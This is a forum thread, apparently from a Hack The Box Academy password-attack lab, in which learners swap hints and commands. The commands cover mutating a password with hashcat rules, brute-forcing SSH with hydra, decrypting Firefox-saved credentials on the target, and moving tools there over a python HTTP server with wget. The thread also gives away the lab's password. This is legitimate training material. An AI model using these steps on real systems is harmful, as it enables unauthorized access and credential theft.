PASSWORD ATTACK | ACADEMY - Credential Hunting in Linux

Friends, Enemies

I have a password for Kira’s user.

“Do I need to resort to SSH brute-forcing? I’ve been lingering around port 445 for quite some time.”

“I couldn’t find anonymous login on port 21, and there’s no file sharing on port 445 either. Only port 22 is left. I’m frustrated about how to connect to this Linux machine.”

You need to run a dictionary attack on the SSH port with the user kira in lower case.

First you need to mutate the password that you can get in the hunt description.
The common error is that we mutate the password.list downloaded from the Resource. This is the problem. You need to make a file with only 1 password. So, mutate this password.

“Thank you for your response. I’m going to handle it now.”

Hello, I’m stuck in this module.

I’m connected to SSH as kira but I can’t find will’s password.

I got in ssh as kira. Now trying to decrypt Firefox is throwing an error. Anyone else have this problem? Looking for a nudge.

Select the Mozilla profile you wish to decrypt
1 → lktd9y8y.default
2 → ytb95ytb.default-release
2024-04-22 01:31:52,781 - ERROR - Couldn’t initialize NSS, maybe ‘/home/kira/.mozilla/firefox/ytb95ytb.default-release’ is not a valid profile?

I also have the password, but I am encountering a strange event. When I try to ssh kira@
Connection closed by port 22
I also tried ssh but after waiting for minutes, it doesn’t give any response. I am very confused about what to do since I have the cracked password from using Hydra but since I don’t get any response from ssh, I don’t know what to do.

I have no idea about the situation. Try to look at the state of the port with nmap before starting the scan and see if it is closed or filtered.



There has to be something wrong with the instance you are connecting to. I have had a ton of network-related issues on HTB for the last two weeks.

your hint is amazing bro, big thanks


Hello, hey, this is my first time posting something in this community … I already solved this path and here I leave how I did it:

  1. Create a file with the password Loveyou1 using the custom.rule:
     hashcat --force /home//password1k.txt -r custom.rule --stdout | sort -u > mut_password4.list

  2. Use hydra to crack the new password:
     hydra -l kira -P /home/xxx/mut_password.list

  3. Read the bash_history carefully.

Thank you and good luck.


Hi there, I have found “authorized_keys”, although what should I do after this? I tried to use, but it shows “no file or directory”. Please give me a hint.

Read the bash_history to use the download it on your attacker machine and then use python to transfer the file to your target

Download the resources zip file and extract them from the top of the page

echo "Loveyou1" | hashcat --force -r Downloads/custom.rule --stdout | sort -u > mutated-passwords

cat mutated-passwords

Is anyone else having an issue with resolving the host?

kira@nix01:~$ git clone
Cloning into 'firefox_decrypt'...
fatal: unable to access '': Could not resolve host:


I solved it by creating a simple python server connection between the two:

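# On the attack machine: serve the firefox_decrypt directory over HTTP
cd /home/user/firefox_decrypt
python3 -m http.server 8000
# On the target: fetch the served files recursively from the attack machine
wget http://<attack-ip>:8000 -r -np -nH --cut-dirs=1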

I hope this helps anyone who might be stuck

For the past few months I have found tremendous value from the community with HTB. I wanted to make my first post, hoping to contribute to the community with some guidance.

If you’re like me and having problems with some of the password challenges, make sure that you read up on various file transfer methods out there. Do not limit yourself to HTB.

I found this video on YouTube to be very helpful,

Combine that video with the help from the posts above.

Cheers, thank you HTB community.